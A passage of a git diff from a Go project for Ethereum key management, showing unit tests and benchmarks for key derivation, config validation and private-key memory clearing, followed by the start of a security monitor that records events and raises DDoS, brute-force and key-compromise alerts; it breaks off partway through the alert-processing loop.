|
||||
// TestDeriveEncryptionKey tests the key derivation function
|
||||
func TestDeriveEncryptionKey(t *testing.T) {
|
||||
// Test with valid master key
|
||||
masterKey := "test_encryption_key_very_long_and_secure_for_testing"
|
||||
key, err := deriveEncryptionKey(masterKey)
|
||||
require.NoError(t, err)
|
||||
assert.NotNil(t, key)
|
||||
assert.Len(t, key, 32) // Should be 32 bytes for AES-256
|
||||
|
||||
// Test with different master key (should produce different result)
|
||||
differentKey := "different_test_encryption_key_very_long_and_secure_for_testing"
|
||||
key2, err := deriveEncryptionKey(differentKey)
|
||||
require.NoError(t, err)
|
||||
assert.NotEqual(t, key, key2)
|
||||
|
||||
// Test with empty master key
|
||||
_, err = deriveEncryptionKey("")
|
||||
assert.Error(t, err)
|
||||
}
|
||||
|
||||
// TestValidateConfig tests the configuration validation function
|
||||
func TestValidateConfig(t *testing.T) {
|
||||
// Test with valid config
|
||||
validConfig := &KeyManagerConfig{
|
||||
KeystorePath: "/tmp/test",
|
||||
EncryptionKey: "test_encryption_key_very_long_and_secure_for_testing",
|
||||
}
|
||||
err := validateConfig(validConfig)
|
||||
assert.NoError(t, err)
|
||||
|
||||
// Test with empty encryption key
|
||||
emptyKeyConfig := &KeyManagerConfig{
|
||||
KeystorePath: "/tmp/test",
|
||||
EncryptionKey: "",
|
||||
}
|
||||
err = validateConfig(emptyKeyConfig)
|
||||
assert.Error(t, err)
|
||||
assert.Contains(t, err.Error(), "encryption key cannot be empty")
|
||||
|
||||
// Test with short encryption key
|
||||
shortKeyConfig := &KeyManagerConfig{
|
||||
KeystorePath: "/tmp/test",
|
||||
EncryptionKey: "short",
|
||||
}
|
||||
err = validateConfig(shortKeyConfig)
|
||||
assert.Error(t, err)
|
||||
assert.Contains(t, err.Error(), "encryption key must be at least 32 characters")
|
||||
|
||||
// Test with empty keystore path
|
||||
emptyPathConfig := &KeyManagerConfig{
|
||||
KeystorePath: "",
|
||||
EncryptionKey: "test_encryption_key_very_long_and_secure_for_testing",
|
||||
}
|
||||
err = validateConfig(emptyPathConfig)
|
||||
assert.Error(t, err)
|
||||
assert.Contains(t, err.Error(), "keystore path cannot be empty")
|
||||
}
|
||||
|
||||
// TestClearPrivateKey tests the private key clearing function
|
||||
func TestClearPrivateKey(t *testing.T) {
|
||||
// Generate a test private key
|
||||
privateKey, err := crypto.GenerateKey()
|
||||
require.NoError(t, err)
|
||||
|
||||
// Store original D value for comparison
|
||||
originalD := new(big.Int).Set(privateKey.D)
|
||||
|
||||
// Clear the private key
|
||||
clearPrivateKey(privateKey)
|
||||
|
||||
// Verify the D value has been cleared (nil or zero)
|
||||
if privateKey.D != nil {
|
||||
assert.Zero(t, privateKey.D.Sign())
|
||||
} else {
|
||||
assert.Nil(t, privateKey.D)
|
||||
}
|
||||
assert.NotEqual(t, originalD, privateKey.D)
|
||||
|
||||
// Test with nil private key (should not panic)
|
||||
clearPrivateKey(nil)
|
||||
}
|
||||
|
||||
// TestGenerateAuditID tests the audit ID generation function
|
||||
func TestGenerateAuditID(t *testing.T) {
|
||||
id1 := generateAuditID()
|
||||
id2 := generateAuditID()
|
||||
|
||||
// Both should be non-empty and different
|
||||
assert.NotEmpty(t, id1)
|
||||
assert.NotEmpty(t, id2)
|
||||
assert.NotEqual(t, id1, id2)
|
||||
|
||||
// Should be a valid hex string
|
||||
hash1 := common.HexToHash(id1)
|
||||
assert.NotEqual(t, hash1, common.Hash{})
|
||||
|
||||
hash2 := common.HexToHash(id2)
|
||||
assert.NotEqual(t, hash2, common.Hash{})
|
||||
}
|
||||
|
||||
// TestCalculateRiskScore tests the risk score calculation function
|
||||
func TestCalculateRiskScore(t *testing.T) {
|
||||
// Test failed operations (high risk)
|
||||
score := calculateRiskScore("TRANSACTION_SIGNED", false)
|
||||
assert.Equal(t, 8, score)
|
||||
|
||||
// Test successful transaction signing (low-medium risk)
|
||||
score = calculateRiskScore("TRANSACTION_SIGNED", true)
|
||||
assert.Equal(t, 3, score)
|
||||
|
||||
// Test key generation (medium risk)
|
||||
score = calculateRiskScore("KEY_GENERATED", true)
|
||||
assert.Equal(t, 5, score)
|
||||
|
||||
// Test key import (medium risk)
|
||||
score = calculateRiskScore("KEY_IMPORTED", true)
|
||||
assert.Equal(t, 5, score)
|
||||
|
||||
// Test key rotation (medium risk)
|
||||
score = calculateRiskScore("KEY_ROTATED", true)
|
||||
assert.Equal(t, 4, score)
|
||||
|
||||
// Test default (low risk)
|
||||
score = calculateRiskScore("UNKNOWN_OPERATION", true)
|
||||
assert.Equal(t, 2, score)
|
||||
}
|
||||
|
||||
// TestKeyPermissions tests the KeyPermissions struct
|
||||
func TestKeyPermissions(t *testing.T) {
|
||||
// Test creating permissions with max transfer limit
|
||||
maxTransfer := big.NewInt(1000000000000000000) // 1 ETH
|
||||
permissions := KeyPermissions{
|
||||
CanSign: true,
|
||||
CanTransfer: true,
|
||||
MaxTransferWei: maxTransfer,
|
||||
AllowedContracts: []string{
|
||||
"0x1234567890123456789012345678901234567890",
|
||||
"0x0987654321098765432109876543210987654321",
|
||||
},
|
||||
RequireConfirm: true,
|
||||
}
|
||||
|
||||
assert.True(t, permissions.CanSign)
|
||||
assert.True(t, permissions.CanTransfer)
|
||||
assert.Equal(t, maxTransfer, permissions.MaxTransferWei)
|
||||
assert.Len(t, permissions.AllowedContracts, 2)
|
||||
assert.True(t, permissions.RequireConfirm)
|
||||
}
|
||||
|
||||
// BenchmarkKeyGeneration benchmarks key generation performance
|
||||
func BenchmarkKeyGeneration(b *testing.B) {
|
||||
config := &KeyManagerConfig{
|
||||
KeystorePath: "/tmp/benchmark_keystore",
|
||||
EncryptionKey: "test_encryption_key_very_long_and_secure_for_testing",
|
||||
}
|
||||
|
||||
log := logger.New("info", "text", "")
|
||||
km, err := newKeyManagerForTesting(config, log)
|
||||
require.NoError(b, err)
|
||||
|
||||
permissions := KeyPermissions{CanSign: true}
|
||||
|
||||
b.ResetTimer()
|
||||
for i := 0; i < b.N; i++ {
|
||||
_, err := km.GenerateKey("benchmark", permissions)
|
||||
if err != nil {
|
||||
b.Fatal(err)
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// BenchmarkTransactionSigning benchmarks transaction signing performance
|
||||
func BenchmarkTransactionSigning(b *testing.B) {
|
||||
config := &KeyManagerConfig{
|
||||
KeystorePath: "/tmp/benchmark_signing",
|
||||
EncryptionKey: "test_encryption_key_very_long_and_secure_for_testing",
|
||||
}
|
||||
|
||||
log := logger.New("info", "text", "")
|
||||
km, err := newKeyManagerForTesting(config, log)
|
||||
require.NoError(b, err)
|
||||
|
||||
permissions := KeyPermissions{CanSign: true, CanTransfer: true}
|
||||
signerAddr, err := km.GenerateKey("benchmark_signer", permissions)
|
||||
require.NoError(b, err)
|
||||
|
||||
chainID := big.NewInt(1)
|
||||
tx := types.NewTransaction(0, common.Address{}, big.NewInt(1000000000000000000), 21000, big.NewInt(20000000000), nil)
|
||||
|
||||
request := &SigningRequest{
|
||||
Transaction: tx,
|
||||
ChainID: chainID,
|
||||
From: signerAddr,
|
||||
Purpose: "Benchmark transaction",
|
||||
}
|
||||
|
||||
b.ResetTimer()
|
||||
for i := 0; i < b.N; i++ {
|
||||
_, err := km.SignTransaction(request)
|
||||
if err != nil {
|
||||
b.Fatal(err)
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// ENHANCED: Unit tests for memory clearing verification
|
||||
func TestMemoryClearing(t *testing.T) {
|
||||
t.Run("TestSecureClearBigInt", func(t *testing.T) {
|
||||
// Create a big.Int with sensitive data
|
||||
sensitiveValue := big.NewInt(0)
|
||||
sensitiveValue.SetString("123456789012345678901234567890123456789012345678901234567890", 10)
|
||||
|
||||
// Capture the original bits for verification
|
||||
originalBits := make([]big.Word, len(sensitiveValue.Bits()))
|
||||
copy(originalBits, sensitiveValue.Bits())
|
||||
|
||||
// Ensure we have actual data to clear
|
||||
require.True(t, len(originalBits) > 0, "Test requires non-zero big.Int")
|
||||
|
||||
// Clear the sensitive value
|
||||
secureClearBigInt(sensitiveValue)
|
||||
|
||||
// Verify all bits are zeroed
|
||||
clearedBits := sensitiveValue.Bits()
|
||||
for i, bit := range clearedBits {
|
||||
assert.Equal(t, big.Word(0), bit, "Bit %d should be zero after clearing", i)
|
||||
}
|
||||
|
||||
// Verify the value is actually zero
|
||||
assert.True(t, sensitiveValue.Cmp(big.NewInt(0)) == 0, "BigInt should be zero after clearing")
|
||||
})
|
||||
|
||||
t.Run("TestSecureClearBytes", func(t *testing.T) {
|
||||
// Create sensitive byte data
|
||||
sensitiveData := []byte("This is very sensitive private key data that should be cleared")
|
||||
originalData := make([]byte, len(sensitiveData))
|
||||
copy(originalData, sensitiveData)
|
||||
|
||||
// Verify we have data to clear
|
||||
require.True(t, len(sensitiveData) > 0, "Test requires non-empty byte slice")
|
||||
|
||||
// Clear the sensitive data
|
||||
secureClearBytes(sensitiveData)
|
||||
|
||||
// Verify all bytes are zeroed
|
||||
for i, b := range sensitiveData {
|
||||
assert.Equal(t, byte(0), b, "Byte %d should be zero after clearing", i)
|
||||
}
|
||||
|
||||
// Verify the data was actually changed
|
||||
assert.NotEqual(t, originalData, sensitiveData, "Data should be different after clearing")
|
||||
})
|
||||
|
||||
t.Run("TestClearPrivateKey", func(t *testing.T) {
|
||||
// Generate a test private key
|
||||
privateKey, err := crypto.GenerateKey()
|
||||
require.NoError(t, err)
|
||||
|
||||
// Store original values for verification
|
||||
originalD := new(big.Int).Set(privateKey.D)
|
||||
originalX := new(big.Int).Set(privateKey.PublicKey.X)
|
||||
originalY := new(big.Int).Set(privateKey.PublicKey.Y)
|
||||
|
||||
// Verify we have actual key material
|
||||
require.True(t, originalD.Cmp(big.NewInt(0)) != 0, "Private key D should not be zero")
|
||||
require.True(t, originalX.Cmp(big.NewInt(0)) != 0, "Public key X should not be zero")
|
||||
require.True(t, originalY.Cmp(big.NewInt(0)) != 0, "Public key Y should not be zero")
|
||||
|
||||
// Clear the private key
|
||||
clearPrivateKey(privateKey)
|
||||
|
||||
// Verify all components are nil or zero
|
||||
assert.Nil(t, privateKey.D, "Private key D should be nil after clearing")
|
||||
assert.Nil(t, privateKey.PublicKey.X, "Public key X should be nil after clearing")
|
||||
assert.Nil(t, privateKey.PublicKey.Y, "Public key Y should be nil after clearing")
|
||||
assert.Nil(t, privateKey.PublicKey.Curve, "Curve should be nil after clearing")
|
||||
})
|
||||
}
|
||||
|
||||
// ENHANCED: Test memory usage monitoring
|
||||
func TestKeyMemoryMetrics(t *testing.T) {
|
||||
config := &KeyManagerConfig{
|
||||
KeystorePath: "/tmp/test_keystore_metrics",
|
||||
EncryptionKey: "test_encryption_key_very_long_and_secure_for_testing",
|
||||
BackupEnabled: false,
|
||||
MaxFailedAttempts: 3,
|
||||
LockoutDuration: 5 * time.Minute,
|
||||
}
|
||||
|
||||
log := logger.New("info", "text", "")
|
||||
km, err := newKeyManagerForTesting(config, log)
|
||||
require.NoError(t, err)
|
||||
|
||||
// Get initial metrics
|
||||
initialMetrics := km.GetMemoryMetrics()
|
||||
assert.NotNil(t, initialMetrics)
|
||||
assert.Equal(t, 0, initialMetrics.ActiveKeys)
|
||||
assert.Greater(t, initialMetrics.MemoryUsageBytes, int64(0))
|
||||
|
||||
// Generate some keys
|
||||
permissions := KeyPermissions{
|
||||
CanSign: true,
|
||||
CanTransfer: true,
|
||||
MaxTransferWei: big.NewInt(1000000000000000000),
|
||||
}
|
||||
|
||||
addr1, err := km.GenerateKey("test", permissions)
|
||||
require.NoError(t, err)
|
||||
|
||||
// Check metrics after adding a key
|
||||
metricsAfterKey := km.GetMemoryMetrics()
|
||||
assert.Equal(t, 1, metricsAfterKey.ActiveKeys)
|
||||
|
||||
// Test memory protection wrapper
|
||||
err = withMemoryProtection(func() error {
|
||||
_, err := km.GenerateKey("test2", permissions)
|
||||
return err
|
||||
})
|
||||
require.NoError(t, err)
|
||||
|
||||
// Check final metrics
|
||||
finalMetrics := km.GetMemoryMetrics()
|
||||
assert.Equal(t, 2, finalMetrics.ActiveKeys)
|
||||
|
||||
// Note: No cleanup method available, keys remain for test duration
|
||||
_ = addr1 // Silence unused variable warning
|
||||
}
|
||||
|
||||
// ENHANCED: Benchmark memory clearing performance
|
||||
func BenchmarkMemoryClearing(b *testing.B) {
|
||||
b.Run("BenchmarkSecureClearBigInt", func(b *testing.B) {
|
||||
// Create test big.Int values
|
||||
values := make([]*big.Int, b.N)
|
||||
for i := 0; i < b.N; i++ {
|
||||
values[i] = big.NewInt(0)
|
||||
values[i].SetString("123456789012345678901234567890123456789012345678901234567890", 10)
|
||||
}
|
||||
|
||||
b.ResetTimer()
|
||||
for i := 0; i < b.N; i++ {
|
||||
secureClearBigInt(values[i])
|
||||
}
|
||||
})
|
||||
|
||||
b.Run("BenchmarkSecureClearBytes", func(b *testing.B) {
|
||||
// Create test byte slices
|
||||
testData := make([][]byte, b.N)
|
||||
for i := 0; i < b.N; i++ {
|
||||
testData[i] = make([]byte, 64) // 64 bytes like a private key
|
||||
for j := range testData[i] {
|
||||
testData[i][j] = byte(j % 256)
|
||||
}
|
||||
}
|
||||
|
||||
b.ResetTimer()
|
||||
for i := 0; i < b.N; i++ {
|
||||
secureClearBytes(testData[i])
|
||||
}
|
||||
})
|
||||
|
||||
b.Run("BenchmarkClearPrivateKey", func(b *testing.B) {
|
||||
// Generate test private keys
|
||||
keys := make([]*ecdsa.PrivateKey, b.N)
|
||||
for i := 0; i < b.N; i++ {
|
||||
key, err := crypto.GenerateKey()
|
||||
if err != nil {
|
||||
b.Fatal(err)
|
||||
}
|
||||
keys[i] = key
|
||||
}
|
||||
|
||||
b.ResetTimer()
|
||||
for i := 0; i < b.N; i++ {
|
||||
clearPrivateKey(keys[i])
|
||||
}
|
||||
})
|
||||
}
|
||||
714
orig/pkg/security/monitor.go
Normal file
714
orig/pkg/security/monitor.go
Normal file
@@ -0,0 +1,714 @@
|
||||
package security
|
||||
|
||||
import (
|
||||
"encoding/json"
|
||||
"fmt"
|
||||
"sync"
|
||||
"time"
|
||||
)
|
||||
|
||||
// SecurityMonitor provides comprehensive security monitoring and alerting
|
||||
type SecurityMonitor struct {
|
||||
// Alert channels
|
||||
alertChan chan SecurityAlert
|
||||
stopChan chan struct{}
|
||||
|
||||
// Event tracking
|
||||
events []SecurityEvent
|
||||
eventsMutex sync.RWMutex
|
||||
maxEvents int
|
||||
|
||||
// Metrics
|
||||
metrics *SecurityMetrics
|
||||
metricsMutex sync.RWMutex
|
||||
|
||||
// Configuration
|
||||
config *MonitorConfig
|
||||
|
||||
// Alert handlers
|
||||
alertHandlers []AlertHandler
|
||||
}
|
||||
|
||||
// SecurityAlert represents a security alert
|
||||
type SecurityAlert struct {
|
||||
ID string `json:"id"`
|
||||
Timestamp time.Time `json:"timestamp"`
|
||||
Level AlertLevel `json:"level"`
|
||||
Type AlertType `json:"type"`
|
||||
Title string `json:"title"`
|
||||
Description string `json:"description"`
|
||||
Source string `json:"source"`
|
||||
Data map[string]interface{} `json:"data"`
|
||||
Actions []string `json:"recommended_actions"`
|
||||
Resolved bool `json:"resolved"`
|
||||
ResolvedAt *time.Time `json:"resolved_at,omitempty"`
|
||||
ResolvedBy string `json:"resolved_by,omitempty"`
|
||||
}
|
||||
|
||||
// SecurityEvent represents a security-related event
|
||||
type SecurityEvent struct {
|
||||
ID string `json:"id"`
|
||||
Timestamp time.Time `json:"timestamp"`
|
||||
Type EventType `json:"type"`
|
||||
Source string `json:"source"`
|
||||
Description string `json:"description"`
|
||||
Data map[string]interface{} `json:"data"`
|
||||
Severity EventSeverity `json:"severity"`
|
||||
IPAddress string `json:"ip_address,omitempty"`
|
||||
UserAgent string `json:"user_agent,omitempty"`
|
||||
}
|
||||
|
||||
// SecurityMetrics tracks security-related metrics
|
||||
type SecurityMetrics struct {
|
||||
// Request metrics
|
||||
TotalRequests int64 `json:"total_requests"`
|
||||
BlockedRequests int64 `json:"blocked_requests"`
|
||||
SuspiciousRequests int64 `json:"suspicious_requests"`
|
||||
|
||||
// Attack metrics
|
||||
DDoSAttempts int64 `json:"ddos_attempts"`
|
||||
BruteForceAttempts int64 `json:"brute_force_attempts"`
|
||||
SQLInjectionAttempts int64 `json:"sql_injection_attempts"`
|
||||
|
||||
// Rate limiting metrics
|
||||
RateLimitViolations int64 `json:"rate_limit_violations"`
|
||||
IPBlocks int64 `json:"ip_blocks"`
|
||||
|
||||
// Key management metrics
|
||||
KeyAccessAttempts int64 `json:"key_access_attempts"`
|
||||
FailedKeyAccess int64 `json:"failed_key_access"`
|
||||
KeyRotations int64 `json:"key_rotations"`
|
||||
|
||||
// Transaction metrics
|
||||
TransactionsAnalyzed int64 `json:"transactions_analyzed"`
|
||||
SuspiciousTransactions int64 `json:"suspicious_transactions"`
|
||||
BlockedTransactions int64 `json:"blocked_transactions"`
|
||||
|
||||
// Time series data
|
||||
HourlyMetrics map[string]int64 `json:"hourly_metrics"`
|
||||
DailyMetrics map[string]int64 `json:"daily_metrics"`
|
||||
|
||||
// Last update
|
||||
LastUpdated time.Time `json:"last_updated"`
|
||||
}
|
||||
|
||||
// AlertLevel represents the severity level of an alert
|
||||
type AlertLevel string
|
||||
|
||||
const (
|
||||
AlertLevelInfo AlertLevel = "INFO"
|
||||
AlertLevelWarning AlertLevel = "WARNING"
|
||||
AlertLevelError AlertLevel = "ERROR"
|
||||
AlertLevelCritical AlertLevel = "CRITICAL"
|
||||
)
|
||||
|
||||
// AlertType represents the type of security alert
|
||||
type AlertType string
|
||||
|
||||
const (
|
||||
AlertTypeDDoS AlertType = "DDOS"
|
||||
AlertTypeBruteForce AlertType = "BRUTE_FORCE"
|
||||
AlertTypeRateLimit AlertType = "RATE_LIMIT"
|
||||
AlertTypeUnauthorized AlertType = "UNAUTHORIZED_ACCESS"
|
||||
AlertTypeSuspicious AlertType = "SUSPICIOUS_ACTIVITY"
|
||||
AlertTypeKeyCompromise AlertType = "KEY_COMPROMISE"
|
||||
AlertTypeTransaction AlertType = "SUSPICIOUS_TRANSACTION"
|
||||
AlertTypeConfiguration AlertType = "CONFIGURATION_ISSUE"
|
||||
AlertTypePerformance AlertType = "PERFORMANCE_ISSUE"
|
||||
)
|
||||
|
||||
// EventType represents the type of security event
|
||||
type EventType string
|
||||
|
||||
const (
|
||||
EventTypeLogin EventType = "LOGIN"
|
||||
EventTypeLogout EventType = "LOGOUT"
|
||||
EventTypeKeyAccess EventType = "KEY_ACCESS"
|
||||
EventTypeTransaction EventType = "TRANSACTION"
|
||||
EventTypeConfiguration EventType = "CONFIGURATION_CHANGE"
|
||||
EventTypeError EventType = "ERROR"
|
||||
EventTypeAlert EventType = "ALERT"
|
||||
)
|
||||
|
||||
// EventSeverity represents the severity of a security event
|
||||
type EventSeverity string
|
||||
|
||||
const (
|
||||
SeverityLow EventSeverity = "LOW"
|
||||
SeverityMedium EventSeverity = "MEDIUM"
|
||||
SeverityHigh EventSeverity = "HIGH"
|
||||
SeverityCritical EventSeverity = "CRITICAL"
|
||||
)
|
||||
|
||||
// MonitorConfig provides configuration for security monitoring
|
||||
type MonitorConfig struct {
|
||||
// Alert settings
|
||||
EnableAlerts bool `json:"enable_alerts"`
|
||||
AlertBuffer int `json:"alert_buffer"`
|
||||
AlertRetention time.Duration `json:"alert_retention"`
|
||||
|
||||
// Event settings
|
||||
MaxEvents int `json:"max_events"`
|
||||
EventRetention time.Duration `json:"event_retention"`
|
||||
|
||||
// Monitoring intervals
|
||||
MetricsInterval time.Duration `json:"metrics_interval"`
|
||||
CleanupInterval time.Duration `json:"cleanup_interval"`
|
||||
|
||||
// Thresholds
|
||||
DDoSThreshold int `json:"ddos_threshold"`
|
||||
ErrorRateThreshold float64 `json:"error_rate_threshold"`
|
||||
|
||||
// Notification settings
|
||||
EmailNotifications bool `json:"email_notifications"`
|
||||
SlackNotifications bool `json:"slack_notifications"`
|
||||
WebhookURL string `json:"webhook_url"`
|
||||
}
|
||||
|
||||
// AlertHandler defines the interface for handling security alerts
|
||||
type AlertHandler interface {
|
||||
HandleAlert(alert SecurityAlert) error
|
||||
GetName() string
|
||||
}
|
||||
|
||||
// NewSecurityMonitor creates a new security monitor
|
||||
func NewSecurityMonitor(config *MonitorConfig) *SecurityMonitor {
|
||||
cfg := defaultMonitorConfig()
|
||||
|
||||
if config != nil {
|
||||
cfg.EnableAlerts = config.EnableAlerts
|
||||
if config.AlertBuffer > 0 {
|
||||
cfg.AlertBuffer = config.AlertBuffer
|
||||
}
|
||||
if config.AlertRetention > 0 {
|
||||
cfg.AlertRetention = config.AlertRetention
|
||||
}
|
||||
if config.MaxEvents > 0 {
|
||||
cfg.MaxEvents = config.MaxEvents
|
||||
}
|
||||
if config.EventRetention > 0 {
|
||||
cfg.EventRetention = config.EventRetention
|
||||
}
|
||||
if config.MetricsInterval > 0 {
|
||||
cfg.MetricsInterval = config.MetricsInterval
|
||||
}
|
||||
if config.CleanupInterval > 0 {
|
||||
cfg.CleanupInterval = config.CleanupInterval
|
||||
}
|
||||
if config.DDoSThreshold > 0 {
|
||||
cfg.DDoSThreshold = config.DDoSThreshold
|
||||
}
|
||||
if config.ErrorRateThreshold > 0 {
|
||||
cfg.ErrorRateThreshold = config.ErrorRateThreshold
|
||||
}
|
||||
cfg.EmailNotifications = config.EmailNotifications
|
||||
cfg.SlackNotifications = config.SlackNotifications
|
||||
cfg.WebhookURL = config.WebhookURL
|
||||
}
|
||||
|
||||
sm := &SecurityMonitor{
|
||||
alertChan: make(chan SecurityAlert, cfg.AlertBuffer),
|
||||
stopChan: make(chan struct{}),
|
||||
events: make([]SecurityEvent, 0),
|
||||
maxEvents: cfg.MaxEvents,
|
||||
config: cfg,
|
||||
alertHandlers: make([]AlertHandler, 0),
|
||||
metrics: &SecurityMetrics{
|
||||
HourlyMetrics: make(map[string]int64),
|
||||
DailyMetrics: make(map[string]int64),
|
||||
LastUpdated: time.Now(),
|
||||
},
|
||||
}
|
||||
|
||||
// Start monitoring routines
|
||||
go sm.alertProcessor()
|
||||
go sm.metricsCollector()
|
||||
go sm.cleanupRoutine()
|
||||
|
||||
return sm
|
||||
}
|
||||
|
||||
func defaultMonitorConfig() *MonitorConfig {
|
||||
return &MonitorConfig{
|
||||
EnableAlerts: true,
|
||||
AlertBuffer: 1000,
|
||||
AlertRetention: 24 * time.Hour,
|
||||
MaxEvents: 10000,
|
||||
EventRetention: 7 * 24 * time.Hour,
|
||||
MetricsInterval: time.Minute,
|
||||
CleanupInterval: time.Hour,
|
||||
DDoSThreshold: 1000,
|
||||
ErrorRateThreshold: 0.05,
|
||||
}
|
||||
}
|
||||
|
||||
// RecordEvent records a security event
|
||||
func (sm *SecurityMonitor) RecordEvent(eventType EventType, source, description string, severity EventSeverity, data map[string]interface{}) {
|
||||
event := SecurityEvent{
|
||||
ID: fmt.Sprintf("evt_%d", time.Now().UnixNano()),
|
||||
Timestamp: time.Now(),
|
||||
Type: eventType,
|
||||
Source: source,
|
||||
Description: description,
|
||||
Data: data,
|
||||
Severity: severity,
|
||||
}
|
||||
|
||||
// Extract IP and User Agent from data if available
|
||||
if ip, exists := data["ip_address"]; exists {
|
||||
if ipStr, ok := ip.(string); ok {
|
||||
event.IPAddress = ipStr
|
||||
}
|
||||
}
|
||||
if ua, exists := data["user_agent"]; exists {
|
||||
if uaStr, ok := ua.(string); ok {
|
||||
event.UserAgent = uaStr
|
||||
}
|
||||
}
|
||||
|
||||
sm.eventsMutex.Lock()
|
||||
|
||||
// Add event to list
|
||||
sm.events = append(sm.events, event)
|
||||
|
||||
// Trim events if too many
|
||||
if len(sm.events) > sm.maxEvents {
|
||||
sm.events = sm.events[len(sm.events)-sm.maxEvents:]
|
||||
}
|
||||
|
||||
sm.eventsMutex.Unlock()
|
||||
|
||||
// Update metrics
|
||||
sm.updateMetricsForEvent(event)
|
||||
|
||||
// Check if event should trigger an alert
|
||||
sm.checkForAlerts(event)
|
||||
}
|
||||
|
||||
// TriggerAlert manually triggers a security alert
|
||||
func (sm *SecurityMonitor) TriggerAlert(level AlertLevel, alertType AlertType, title, description, source string, data map[string]interface{}, actions []string) {
|
||||
alert := SecurityAlert{
|
||||
ID: fmt.Sprintf("alert_%d", time.Now().UnixNano()),
|
||||
Timestamp: time.Now(),
|
||||
Level: level,
|
||||
Type: alertType,
|
||||
Title: title,
|
||||
Description: description,
|
||||
Source: source,
|
||||
Data: data,
|
||||
Actions: actions,
|
||||
Resolved: false,
|
||||
}
|
||||
|
||||
select {
|
||||
case sm.alertChan <- alert:
|
||||
// Alert sent successfully
|
||||
default:
|
||||
// Alert channel is full, log this issue
|
||||
sm.RecordEvent(EventTypeError, "SecurityMonitor", "Alert channel full", SeverityHigh, map[string]interface{}{
|
||||
"alert_type": alertType,
|
||||
"alert_level": level,
|
||||
})
|
||||
}
|
||||
}
|
||||
|
||||
// checkForAlerts checks if an event should trigger alerts
|
||||
func (sm *SecurityMonitor) checkForAlerts(event SecurityEvent) {
|
||||
switch event.Type {
|
||||
case EventTypeKeyAccess:
|
||||
if event.Severity == SeverityCritical {
|
||||
sm.TriggerAlert(
|
||||
AlertLevelCritical,
|
||||
AlertTypeKeyCompromise,
|
||||
"Critical Key Access Event",
|
||||
"A critical key access event was detected",
|
||||
event.Source,
|
||||
event.Data,
|
||||
[]string{"Investigate immediately", "Rotate keys if compromised", "Review access logs"},
|
||||
)
|
||||
}
|
||||
|
||||
case EventTypeTransaction:
|
||||
if event.Severity == SeverityHigh || event.Severity == SeverityCritical {
|
||||
sm.TriggerAlert(
|
||||
AlertLevelError,
|
||||
AlertTypeTransaction,
|
||||
"Suspicious Transaction Detected",
|
||||
"A suspicious transaction was detected and blocked",
|
||||
event.Source,
|
||||
event.Data,
|
||||
[]string{"Review transaction details", "Check for pattern", "Update security rules"},
|
||||
)
|
||||
}
|
||||
|
||||
case EventTypeError:
|
||||
if event.Severity == SeverityCritical {
|
||||
sm.TriggerAlert(
|
||||
AlertLevelCritical,
|
||||
AlertTypeConfiguration,
|
||||
"Critical System Error",
|
||||
"A critical system error occurred",
|
||||
event.Source,
|
||||
event.Data,
|
||||
[]string{"Check system logs", "Verify configuration", "Restart services if needed"},
|
||||
)
|
||||
}
|
||||
}
|
||||
|
||||
// Check for patterns that might indicate attacks
|
||||
sm.checkAttackPatterns(event)
|
||||
}
|
||||
|
||||
// checkAttackPatterns checks for attack patterns in events
|
||||
func (sm *SecurityMonitor) checkAttackPatterns(event SecurityEvent) {
|
||||
sm.eventsMutex.RLock()
|
||||
defer sm.eventsMutex.RUnlock()
|
||||
|
||||
// Look for patterns in recent events
|
||||
recentEvents := make([]SecurityEvent, 0)
|
||||
cutoff := time.Now().Add(-5 * time.Minute)
|
||||
|
||||
for _, e := range sm.events {
|
||||
if e.Timestamp.After(cutoff) {
|
||||
recentEvents = append(recentEvents, e)
|
||||
}
|
||||
}
|
||||
|
||||
// Check for DDoS patterns
|
||||
if len(recentEvents) > sm.config.DDoSThreshold {
|
||||
ipCounts := make(map[string]int)
|
||||
for _, e := range recentEvents {
|
||||
if e.IPAddress != "" {
|
||||
ipCounts[e.IPAddress]++
|
||||
}
|
||||
}
|
||||
|
||||
for ip, count := range ipCounts {
|
||||
if count > sm.config.DDoSThreshold/10 {
|
||||
sm.TriggerAlert(
|
||||
AlertLevelError,
|
||||
AlertTypeDDoS,
|
||||
"DDoS Attack Detected",
|
||||
fmt.Sprintf("High request volume from IP %s", ip),
|
||||
"SecurityMonitor",
|
||||
map[string]interface{}{
|
||||
"ip_address": ip,
|
||||
"request_count": count,
|
||||
"time_window": "5 minutes",
|
||||
},
|
||||
[]string{"Block IP address", "Investigate traffic pattern", "Scale infrastructure if needed"},
|
||||
)
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// Check for brute force patterns
|
||||
failedLogins := 0
|
||||
for _, e := range recentEvents {
|
||||
if e.Type == EventTypeLogin && e.Severity == SeverityHigh {
|
||||
failedLogins++
|
||||
}
|
||||
}
|
||||
|
||||
if failedLogins > 10 {
|
||||
sm.TriggerAlert(
|
||||
AlertLevelWarning,
|
||||
AlertTypeBruteForce,
|
||||
"Brute Force Attack Detected",
|
||||
"Multiple failed login attempts detected",
|
||||
"SecurityMonitor",
|
||||
map[string]interface{}{
|
||||
"failed_attempts": failedLogins,
|
||||
"time_window": "5 minutes",
|
||||
},
|
||||
[]string{"Review access logs", "Consider IP blocking", "Strengthen authentication"},
|
||||
)
|
||||
}
|
||||
}
|
||||
|
||||
// updateMetricsForEvent updates metrics based on an event
|
||||
func (sm *SecurityMonitor) updateMetricsForEvent(event SecurityEvent) {
|
||||
sm.metricsMutex.Lock()
|
||||
defer sm.metricsMutex.Unlock()
|
||||
|
||||
sm.metrics.TotalRequests++
|
||||
|
||||
switch event.Type {
|
||||
case EventTypeKeyAccess:
|
||||
sm.metrics.KeyAccessAttempts++
|
||||
if event.Severity == SeverityHigh || event.Severity == SeverityCritical {
|
||||
sm.metrics.FailedKeyAccess++
|
||||
}
|
||||
|
||||
case EventTypeTransaction:
|
||||
sm.metrics.TransactionsAnalyzed++
|
||||
if event.Severity == SeverityHigh || event.Severity == SeverityCritical {
|
||||
sm.metrics.SuspiciousTransactions++
|
||||
}
|
||||
}
|
||||
|
||||
// Update time-based metrics
|
||||
hour := event.Timestamp.Format("2006-01-02-15")
|
||||
day := event.Timestamp.Format("2006-01-02")
|
||||
|
||||
sm.metrics.HourlyMetrics[hour]++
|
||||
sm.metrics.DailyMetrics[day]++
|
||||
sm.metrics.LastUpdated = time.Now()
|
||||
}
|
||||
|
||||
// alertProcessor processes alerts from the alert channel
|
||||
func (sm *SecurityMonitor) alertProcessor() {
|
||||
for {
|
||||
select {
|
||||
case alert := <-sm.alertChan:
|
||||
